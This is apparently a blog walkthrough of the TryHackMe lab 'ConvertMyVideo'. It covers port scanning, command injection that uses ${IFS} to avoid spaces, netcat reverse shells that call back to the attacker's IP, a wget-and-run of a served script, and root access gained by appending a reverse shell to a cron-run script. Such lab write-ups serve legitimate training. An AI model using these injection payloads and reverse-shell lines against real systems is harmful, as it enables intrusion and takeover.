Post

ConvertMyVideo - Medium THM

Posted Updated
By TFA 2 min read
  • OS: Linux
  • Difficulty: Medium
  • Author: Talace

Scanning 🤖

threader300.py

1

**python3 threader3000.py**

1
2

Port 22 is open
Port 80 is open

nmap scan

1

nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.232.225 10.10.232.225

1
2

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Enumeration 👀

dirb scan

1

dirb http://10.10.232.225/ /usr/share/wordlists/dirb/common.txt

1
2

---- Scanning URL: http://10.10.232.225/ ----
+ http://10.10.232.225/admin (CODE:401|SIZE:460)

Command injection 💉

We spawn on the main page

mainPage

I capture the request in burp.. seems not very secure burp1

Try ‘id’ command, it works! idCommand

I can’t ‘ls -la’, it return nothing, maybe i can’t have white space ? I have found that the var IFS, is by default a ‘ ‘, so let’s try with it!

1

--version;ls${IFS}-la;

Nice it work, from this i’m able to retrieve a lot of data, and the user by the same occasion userFlag

It’s cool, but we need a way to enter, let’s put a reverse shell in it! open my listener:

1

nc -nvlp 4444

And send my reverse shell!

1

rm${IFS}/tmp/f;mkfifo${IFS}/tmp/f;cat${IFS}/tmp/f|sh${IFS}-i${IFS}2>&1|nc${IFS}10.8.138.226${IFS}4444${IFS}>/tmp/f;

Oh crap!? It close instantly, let’s wget and run script!😦

1

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.138.226 4444 >/tmp/f" >> shell.sh

Open a http server

1

python3 -m http.server 80

And lunch my new command, wget the script and run it with bash

1

--version;wget${IFS}http://10.8.138.226/pwn.sh;bash${IFS}shell.sh;

Yessir! We are in!😼

Privilege escalation 🐧

Upgrade the shell

1

python -c 'import pty; pty.spawn("/bin/bash")'

Let’s run pspy check wich one is need:

1
2
3

uname -a

Output: Linux dmv 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

I need the 64 bits, wget it and change rights:

1
2
3

wget http://10.8.138.226:81/pspy64
&&
chmod +xs pspy64

Now lunch the pspy

./pspy64, Oh interesting cron job!

1

2023/11/11 18:13:01 CMD: UID=0     PID=27982  | bash /var/www/html/tmp/clean.sh

Let’s lunch a reverseshell from it.

Open a netcat:

1

nc -nvlp 4445

Now put the revershell in it.

1

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.138.226 4445 >/tmp/f" >> clean.sh

Go back on your netcat… Boom! Got root GG!

ROOT

Resources

How to run a command without white space: Article

writeup, TryHackMe
Command injection Web
This post is licensed under CC BY 4.0 by the author.